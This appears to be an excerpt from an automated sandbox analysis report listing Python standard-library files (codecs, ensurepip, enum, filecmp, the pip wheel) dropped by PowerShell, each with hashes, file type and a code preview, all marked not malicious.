                                                                                                                                                                                                                      SHA-512:AAF1FB52FCB6BCE9D3E026BD4866149D48F5E2434A735DED9165C65A5FD4D0186CC44715A797A890F4E01C9E4CB44453BCA8D4BA6993B93811739CA80E86F5FA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""..Python 'utf-32-be' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_be_encode....def decode(input, errors='strict'):.. return codecs.utf_32_be_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_be_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_be_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_be_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_be_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-be',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):967
                                                                                                                                                                                                                      Entropy (8bit):4.629711576470682
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:gEVyWWq1IjyatMufQpb+OyWE0kzyWczryWj9ZKj95WJxFplR:g5q1IeaCuG8zizhTKGJxTz
                                                                                                                                                                                                                      MD5:6647D201D3BAD385BD7897DF02EC45ED
                                                                                                                                                                                                                      SHA1:AADB093709162E4B5F9ABA0590235AFE3D96246B
                                                                                                                                                                                                                      SHA-256:945AF03D1DA591640DE7176BEF879658594B399AC7BBE564D790893CA7B38A73
                                                                                                                                                                                                                      SHA-512:CF7F010E0E199BD017636894D7B1B060E21D2ADF13D81BAE710046889D48604A01D05F10F1B1ACA8033F19E8254857A93334CBBF471E55FD58BD4888B190CE62
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""..Python 'utf-32-le' Codec.."""..import codecs....### Codec APIs....encode = codecs.utf_32_le_encode....def decode(input, errors='strict'):.. return codecs.utf_32_le_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_32_le_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_32_le_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_32_le_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_32_le_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-32-le',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):984
                                                                                                                                                                                                                      Entropy (8bit):4.635801396513396
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:JWyVyW6q1IjWatMufQVb+OyWg0kzyW4zryWH9ZKj9+5JxFplR:JWjq1IiaCu24zmzNTK85JxTz
                                                                                                                                                                                                                      MD5:ECFD453A49D4C576E4F189CF6B23376C
                                                                                                                                                                                                                      SHA1:70B61C19024F20BBC476C11D3CE95AA484225D09
                                                                                                                                                                                                                      SHA-256:1BE7FC4C85EDAAB33427D3F1230D56B8A4B0D75566F726D9DFC50FACEA36688B
                                                                                                                                                                                                                      SHA-512:F6AB67F17F586459362581DD894D3CAF62D67E283C075DFCD15B2D03E0AC79FF53E31853900A9EFF5E8778ECEC7AEE7A945EA55368D663FF82F657E7950B4A51
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'utf-7' Codec....Written by Brian Quinlan (brian@sweetapp.com)..."""..import codecs....### Codec APIs....encode = codecs.utf_7_encode....def decode(input, errors='strict'):.. return codecs.utf_7_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_7_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_7_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_7_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_7_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-7',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReader,.. streamwriter=StreamWriter,.. )..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1047
                                                                                                                                                                                                                      Entropy (8bit):4.729776202710733
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:JgqSEVyW7yEq1IjPatMufQ7y3b+OyWR0kzyW7yWzryWc9ZKj9/JxFplR:J1SKyEq1IjaCuwyr5z1yWzeTKZJxTz
                                                                                                                                                                                                                      MD5:F932D95AFCAEA5FDC12E72D25565F948
                                                                                                                                                                                                                      SHA1:2685D94BA1536B7870B7172C06FE72CF749B4D29
                                                                                                                                                                                                                      SHA-256:9C54C7DB8CE0722CA4DDB5F45D4E170357E37991AFB3FCDC091721BF6C09257E
                                                                                                                                                                                                                      SHA-512:A10035AE10B963D2183D31C72FF681A21ED9E255DDA22624CBAF8DBED5AFBDE7BE05BB719B07573DE9275D8B4793D2F4AEF0C0C8346203EEA606BB818A02CAB6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'utf-8' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....encode = codecs.utf_8_encode....def decode(input, errors='strict'):.. return codecs.utf_8_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.utf_8_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = codecs.utf_8_decode....class StreamWriter(codecs.StreamWriter):.. encode = codecs.utf_8_encode....class StreamReader(codecs.StreamReader):.. decode = codecs.utf_8_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='utf-8',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamReade
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4263
                                                                                                                                                                                                                      Entropy (8bit):4.440495855479389
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:JGJ9aCCIFyqPICuY5lRlDrwzRC35v5lLo3YCaLt3AvBNiLD1Lg9Ft1QYxTKB3:8J9vCIFTwCuolR9rwzRCJhlLIaLtQv+d
                                                                                                                                                                                                                      MD5:99B035D3C80B206F86E525A4DB7704D3
                                                                                                                                                                                                                      SHA1:5006274B7CC61564CF6839AC070631F788FD5FCB
                                                                                                                                                                                                                      SHA-256:21A95BB95448F2F064F08AA2C89E843B87A20A5A13C45C6C47C288F2BE5219A4
                                                                                                                                                                                                                      SHA-512:B19A6876EB04CD5739F99C7C0A07B2269E2EB9A72199A656149DD2B87A25EB0F9945CD9CAEFD2B7DA8756386468294493C6353645CB055343F008CDCFF115F4F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python 'utf-8-sig' Codec..This work similar to UTF-8 with the following changes:....* On encoding/writing a UTF-8 encoded BOM will be prepended/written as the.. first three bytes.....* On decoding/reading if the first three bytes are a UTF-8 encoded BOM, these.. bytes will be skipped..."""..import codecs....### Codec APIs....def encode(input, errors='strict'):.. return (codecs.BOM_UTF8 + codecs.utf_8_encode(input, errors)[0],.. len(input))....def decode(input, errors='strict'):.. prefix = 0.. if input[:3] == codecs.BOM_UTF8:.. input = input[3:].. prefix = 3.. (output, consumed) = codecs.utf_8_decode(input, errors, True).. return (output, consumed+prefix)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. codecs.IncrementalEncoder.__init__(self, errors).. self.first = 1.... def encode(self, input, final=False):.. if self.first:.. self.first = 0.. r
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2954
                                                                                                                                                                                                                      Entropy (8bit):4.703525654326454
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:XnE2/bf1OV5FPdLLlKTOARSMoxz1AFPLpLGpW7NRp6/df1Fo141RzuwBvIvPTKrf:XESf1OVjPpUOAoMot8P1HJydf/omXu+P
                                                                                                                                                                                                                      MD5:C62CEDA36D6B362A2250094DFA2EF15A
                                                                                                                                                                                                                      SHA1:D96068DC9790D38B44F3DA580F134EF1C7288B33
                                                                                                                                                                                                                      SHA-256:3991C68ACBB5CE946C6BA71CCB044FBBB449F9EAC9B76262456537EAEBEF9340
                                                                                                                                                                                                                      SHA-512:6C0296817CA26680858DB78B38BF1D1BE39FC7EDB7894979251EA3281496E7447914A12C9C5B41A1EAD12610DD472C00FF9752816FE30CFF4298C083DA29B3A3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""Python 'uu_codec' Codec - UU content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com). Some details were..adapted from uu.py which was written by Lance Ellinghouse and..modified by Jack Jansen and Fredrik Lundh..."""....import codecs..import binascii..from io import BytesIO....### Codec APIs....def uu_encode(input, errors='strict', filename='<data>', mode=0o666):.. assert errors == 'strict'.. infile = BytesIO(input).. outfile = BytesIO().. read = infile.read.. write = outfile.write.... # Remove newline chars from filename.. filename = filename.replace('\n','\\n').. filename = filename.replace('\r','\\r').... # Encode.. write(('begin %o %s\n' % (mode & 0o777, filename)).encode('ascii')).. chunk = read(45).. while chunk:.. write(binascii.b2a_uu(chunk)).. chunk = read(45).. write(b' \nend\n').... return (outfile.getvalue(), len(input))....def uu_decode(input, error
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2281
                                                                                                                                                                                                                      Entropy (8bit):4.555875191198799
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:XLDD4W1AIejO1AI73101ouY51wdP7z0I51wzD5x6Ftx0+HvIvPTKyJxTPH:XHD4W/ejO/73OauY5y7z/58uXnA3TKyD
                                                                                                                                                                                                                      MD5:77C7F92636D3B55460B5E1AFD451D5DB
                                                                                                                                                                                                                      SHA1:DCE6B27A30BC191F9CFA34DEA5A27682AE274DE4
                                                                                                                                                                                                                      SHA-256:9B660028249BDB7E9B80AF1D5432BF0C90B132A6D0DD205E2DED2A3B3275B728
                                                                                                                                                                                                                      SHA-512:93E2E6197321CAD932F88F234EBFAD23F88ABB00C18D2F80C5711D15119CA4D0D1AB261156D6E9A7E1FEEA8A30675759823A3353F353551BA887101CDBBFA98D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""Python 'zlib_codec' Codec - zlib compression encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import zlib # this codec needs the optional zlib module !....### Codec APIs....def zlib_encode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.compress(input), len(input))....def zlib_decode(input, errors='strict'):.. assert errors == 'strict'.. return (zlib.decompress(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return zlib_encode(input, errors).. def decode(self, input, errors='strict'):.. return zlib_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def __init__(self, errors='strict'):.. assert errors == 'strict'.. self.errors = errors.. self.compressobj = zlib.compressobj().... def encode(self, input, final=False):.. if final:.. c
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9734
                                                                                                                                                                                                                      Entropy (8bit):4.712839348125911
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:F0LxaCi8IROG2kcYfJJg4/PwO/sROSs4bGdJAlAPvTGf4RNttRm:F0LxBIRf2A0IWOSsHdQGM6Nxm
                                                                                                                                                                                                                      MD5:A834506779D4F1745E722F61C7B7FB24
                                                                                                                                                                                                                      SHA1:C7939881FEC4FF3E305875232635DB0EEC91C6AD
                                                                                                                                                                                                                      SHA-256:CA96B1B61EF834837C1242BF875D012012ECE0CBB2E4AA2E4F631BBD595E842F
                                                                                                                                                                                                                      SHA-512:14A26599A631F35AA57DF92827CD5B5EBF93897C27C374F59D6B213C17D3EBEDE49F6E30FA92D7BA14041FF276E067E19BE985A3217E33DA92A207C10621DF00
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:import collections..import os..import os.path..import subprocess..import sys..import sysconfig..import tempfile..from importlib import resources......__all__ = ["version", "bootstrap"].._PACKAGE_NAMES = ('pip',).._PIP_VERSION = "24.0".._PROJECTS = [.. ("pip", _PIP_VERSION, "py3"),..]....# Packages bundled in ensurepip._bundled have wheel_name set...# Packages from WHEEL_PKG_DIR have wheel_path set..._Package = collections.namedtuple('Package',.. ('version', 'wheel_name', 'wheel_path'))....# Directory of system wheel packages. Some Linux distribution packaging..# policies recommend against bundling dependencies. For example, Fedora..# installs wheel packages in the /usr/share/python-wheels/ directory and don't..# install the ensurepip._bundled package..._WHEEL_PKG_DIR = sysconfig.get_config_var('WHEEL_PKG_DIR')......def _find_packages(path):.. packages = {}.. try:.. filenames = os.listdir(path).. except OSError:.. # Ignore: path
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):93
                                                                                                                                                                                                                      Entropy (8bit):4.307585564430433
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:JSdQsMn3oUHhAjpv/F0L4MlCAS5Novn:cQsAYsAjpH3lAS/ov
                                                                                                                                                                                                                      MD5:B66408AC25B2935927C825261FAE1D47
                                                                                                                                                                                                                      SHA1:29C8161ACB7EB3E46C1F0E7AB2F72510DAF103F9
                                                                                                                                                                                                                      SHA-256:BE2DEE4F4B55958AAB36AEBBE6D2D644065E9C36A6DD44727E955FC590501925
                                                                                                                                                                                                                      SHA-512:534FACB1A57F917AA343D69221B6F8F4150565730715C71069A1961B6CA425631307AF98FDA5069CBF7FE996D3A14D09DE5F6A9EFD22C6987C16E76F29A31CF0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:import ensurepip..import sys....if __name__ == "__main__":.. sys.exit(ensurepip._main())..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9567
                                                                                                                                                                                                                      Entropy (8bit):5.495322075022345
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:phWKV5oPIbHN9a94saXBsn6O153/TkNKBSIGVIv1W8ZlfppVs:XVV5mZ9UR+15401jZlhpVs
                                                                                                                                                                                                                      MD5:38FE12EDC04A1BD9670825881A4C0841
                                                                                                                                                                                                                      SHA1:E10BACB48B79E385B4224872C37A8D3A51001593
                                                                                                                                                                                                                      SHA-256:97A8C628CBE61A0FEFF64EB8EB67471D4CED02148D86E15AE424D34454313021
                                                                                                                                                                                                                      SHA-512:E994F029E6E6082D4E7E5183443072F12CB88D1D4FD7841F171C00120915D159D8FD67C220BC386B79C527267F71A268BDB33DD06E1903DAC291973CD618531D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e.&..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.g.Z.d.Z.d.Z.d.e.d.f.g.Z...e.j...................d.d.........Z...e.j...................d.........a.d...Z.d...Z.d.a.d.d...Z.d...Z.d...Z.d.d.d.d.d.d.d...d...Z.d.d.d.d.d.d.d...d...Z.d.d...d...Z.d.d...Z.y.)......N)...resources..version..bootstrap)...pipz.24.0r......py3..Package).r......wheel_name..wheel_path..WHEEL_PKG_DIRc..........................i.}...t.........j...................|.........}.t.........|.........}.|.D.]...}.|.j...................d.........s...t.........D.]...}.|.d.z...}.|.j...................|.........s.....n....9|.j...................|.........j...................d.........d.....}.t.........j...................j...................|.|.........}.t.........|.d.|.........|.|.<.......|.S.#.t.........$.r...d.}.Y...w.x.Y.w.).N..z..whl..-r....)...os..listdir..OSError..sorted..endswith.._PACKAGE_NAMES..startswith..removeprefix..partition..path..join.._Package).r..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):372
                                                                                                                                                                                                                      Entropy (8bit):4.9470922589113355
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:4KjxIllIlkZzhe9IuQLWaQlb2+u95/n23d6nH46Iayle+llVSuvhpy6t7Xxt:4KjxI/jduRb4/2InKayleuMu5py6t7Xb
                                                                                                                                                                                                                      MD5:2449D32F83289DFF0A3E57568B405B12
                                                                                                                                                                                                                      SHA1:18E6FE10F73A93F68515CEAC1F1A65BF88B88606
                                                                                                                                                                                                                      SHA-256:F26105DA495A63D4162F43A90D15F8AD27F4B612BE9B96B09427687EB8A1E161
                                                                                                                                                                                                                      SHA-512:34FD4225A11495F41F40A0FAD0270F7EBDB4FCBD3827092A9DD0CF832ED8787009ECBD46ADAF9EB9F29E728A8C5E0B808CB0F7156A89B2CD91D15CE654DBA4F1
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:...........e].........................b.....d.d.l.Z.d.d.l.Z.e.d.k(..r"..e.j.....................e.j.....................................y.y.)......N..__main__)...ensurepip..sys..__name__..exit.._main........XC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\ensurepip\__main__.py..<module>r........s/..................z.......C.H.H._.Y._._...........r....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2110226
                                                                                                                                                                                                                      Entropy (8bit):7.989601069085752
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:49152:MV+RRK1eWXNS0vVOdKNqeLPC8/Lmy0KXBVctxYx4Xn+foz:MV+fG/AAVOdKh2ZL5txYIgoz
                                                                                                                                                                                                                      MD5:74E3C5E4082113B1239CA0E9ABFD1E82
                                                                                                                                                                                                                      SHA1:E44313AE1E6AF3C2BD3B60AB2FA8C34308D00555
                                                                                                                                                                                                                      SHA-256:BA0D021A166865D2265246961BEC0152FF124DE910C5CC39F1156CE3FA7C69DC
                                                                                                                                                                                                                      SHA-512:5D7462A584105BCCAA9CF376F5A8C5827EAD099C813C8AF7392D478A4398F373D9E8CAC7BBAD2DB51B335411AB966B21E119B1B1234C9A7AB70C6DDFC9306DA6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:PK.........NCXP.&.....c.......pip/__init__.py=P.J.@...W.^ta..YP..^.A..e).m...!I]..Nw.@.....Z.#.(t@c...I.[.NJ1.....C..T..@...1...FO..s'._...|8d.W....W....\EQ..$...F.W....1.3..B..&A8.(...S.:.....LI...{.....{hP=...A.^5I.\G.OG[..9y.5..L(.q..dWg....d..Vwv.,i1(.)fT....../V.u.p...l.?PK.........NCXo......V.......pip/__main__.py]RKo.0...W.....9.K..w-v..C..-......#..i......(....<.t...E..o8..BY.q..9Ft.......QD.|\..~.4 ..9...U.W.&.4.@=......y.`f..y...J....~.D...h...!.E!s..8.0..9..R.p....._.....4x..S...........[.......&.t.....Y{U.|.NG..G.....qvN[....G1e........!..1.u.p...\pw)...4.0......n.`.U0m..3..w.O........m'C.m..n..1I..L.VE8E..#+?...........r.zC..!h...meb!{.@.q.7....I......52../..\._.:.<..w..yO.x.<8..c.Nu&......e...e..).MK..p......Y......]..P..|...PK.........NCX~.%.............pip/__pip-runner__.py}T.n.0...+8.0.p...0 X..E...dIz..BPl..fK.$g1...H;N....$.......p......./[.k. 3u...Z...Qt.AB...-j..7..].>..%...D..-+.A:P...xC..H........~.aEiUm.......38/=.5.0......'t
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):839
                                                                                                                                                                                                                      Entropy (8bit):4.54535391507707
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:8QVm1VQL7MNrhuUYyy+Y01uV9gTlHpHILpy/ov:8QIrQLYloVbv6ugTtyLQq
                                                                                                                                                                                                                      MD5:A924387CC28E1ACF2CBCC6D16A000F01
                                                                                                                                                                                                                      SHA1:B789691D39DEF8C95D67782D6CB91EAEDB05FE8B
                                                                                                                                                                                                                      SHA-256:B24642D35A69A8378BD4C8A034C79EFDF0D582D5562ACFCF19F790A90A7D508C
                                                                                                                                                                                                                      SHA-512:A3B5934447A95720D5968EB460A62C2A07B60A6F1073E87EC4FFA3AE7BD2865760404096769484D4C20622A5AF655E97BA1592F09EFE5ED9232DF10D0B390C77
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""Basic pip uninstallation support, helper for the Windows uninstaller"""....import argparse..import ensurepip..import sys......def _main(argv=None):.. parser = argparse.ArgumentParser(prog="python -m ensurepip._uninstall").. parser.add_argument(.. "--version",.. action="version",.. version="pip {}".format(ensurepip.version()),.. help="Show the version of pip this will attempt to uninstall.",.. ).. parser.add_argument(.. "-v", "--verbose",.. action="count",.. default=0,.. dest="verbosity",.. help=("Give more output. Option is additive, and can be used up to 3 ".. "times."),.. ).... args = parser.parse_args(argv).... return ensurepip._uninstall_helper(verbosity=args.verbosity)......if __name__ == "__main__":.. sys.exit(_main())..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):82674
                                                                                                                                                                                                                      Entropy (8bit):4.2245515290398234
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:kNqAIGPR3NYXgvHGe0TkZ+UqfSRCygwMhtbe4/DurHZXLlkPOlRbEuxAX0riAX:kNqAZPR3NYXgvHGe0oZzRCygwOtbe4/G
                                                                                                                                                                                                                      MD5:4979EE28B0185CC180B9D1C22F5402BC
                                                                                                                                                                                                                      SHA1:6C90A8C0CB83FC7CF6E0CE2D13F516D821D18213
                                                                                                                                                                                                                      SHA-256:A72A7DD619B213922D47094FF5BCAB30E59A60404249C71923EA4D8D881EDE00
                                                                                                                                                                                                                      SHA-512:AF596BAD9057A0C71CA1ECA6C548F1525D8087E118C121A589AEE2252D4056CDFA326AB498965551EE7D349C64FA544AFF08876E9C3B076E4F984AACC0591404
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:import sys..import builtins as bltns..from types import MappingProxyType, DynamicClassAttribute..from operator import or_ as _or_..from functools import reduce......__all__ = [.. 'EnumType', 'EnumMeta',.. 'Enum', 'IntEnum', 'StrEnum', 'Flag', 'IntFlag', 'ReprEnum',.. 'auto', 'unique', 'property', 'verify', 'member', 'nonmember',.. 'FlagBoundary', 'STRICT', 'CONFORM', 'EJECT', 'KEEP',.. 'global_flag_repr', 'global_enum_repr', 'global_str', 'global_enum',.. 'EnumCheck', 'CONTINUOUS', 'NAMED_FLAGS', 'UNIQUE',.. 'pickle_by_global_name', 'pickle_by_enum_name',.. ]......# Dummy value for Enum and Flag as there are explicit checks for them..# before they have been created...# This is also why there are checks in EnumType like `if Enum is not None`..Enum = Flag = EJECT = _stdlib_enums = ReprEnum = None....class nonmember(object):.. """.. Protects item from becoming an Enum member during class creation... """.. def __init__(sel
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10500
                                                                                                                                                                                                                      Entropy (8bit):4.528557394014585
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:S4TNBBnKhVsBrA7go4ly/vF1AUCzRUYqRvmC14ziCI6M/UtNiYPWEiOVtYh3+BdI:SWZvoF/vrierHCJM/Utvtc3+T9x9FxS
                                                                                                                                                                                                                      MD5:401DB769DA5728550DB93FF9D4B8B8C9
                                                                                                                                                                                                                      SHA1:C6EDB036A7A071D323AC8744C8B1EC837C0F078D
                                                                                                                                                                                                                      SHA-256:AA9E254243EDCC519AC1915BC5FD7AA384AD1C1E5E140CBD6BF0C77CC73D198F
                                                                                                                                                                                                                      SHA-512:E156F3F7462FA108F31612C9326C265EA31359F44BF6096D989151115DA7946673DB50D0732B3B00B9F9305BC5780F71873AE59D2493F4C2FDEE75508865097A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Utilities for comparing files and directories.....Classes:.. dircmp....Functions:.. cmp(f1, f2, shallow=True) -> int.. cmpfiles(a, b, common) -> ([], [], []).. clear_cache()...."""....import os..import stat..from itertools import filterfalse..from types import GenericAlias....__all__ = ['clear_cache', 'cmp', 'dircmp', 'cmpfiles', 'DEFAULT_IGNORES']...._cache = {}..BUFSIZE = 8*1024....DEFAULT_IGNORES = [.. 'RCS', 'CVS', 'tags', '.git', '.hg', '.bzr', '_darcs', '__pycache__']....def clear_cache():.. """Clear the filecmp cache.""".. _cache.clear()....def cmp(f1, f2, shallow=True):.. """Compare two files..... Arguments:.... f1 -- First file name.... f2 -- Second file name.... shallow -- treat files as identical if their stat signatures (type, size,.. mtime) are identical. Otherwise, files are considered different.. if their sizes or contents differ. [default: True].... Return value:.... True if the files are the same
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):16156
                                                                                                                                                                                                                      Entropy (8bit):4.328063649196717
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:aPuyi2h40tVqXZqRPUJeRalQFufMR2RgzRXhRWRhRHR8p8iqK/5V6E0j0ZP5Od/C:muy7h40QZqR/nFufe8gNXXcXx4TVPZPn
                                                                                                                                                                                                                      MD5:5A4891CC3AC46851BC767DDCB8E3D673
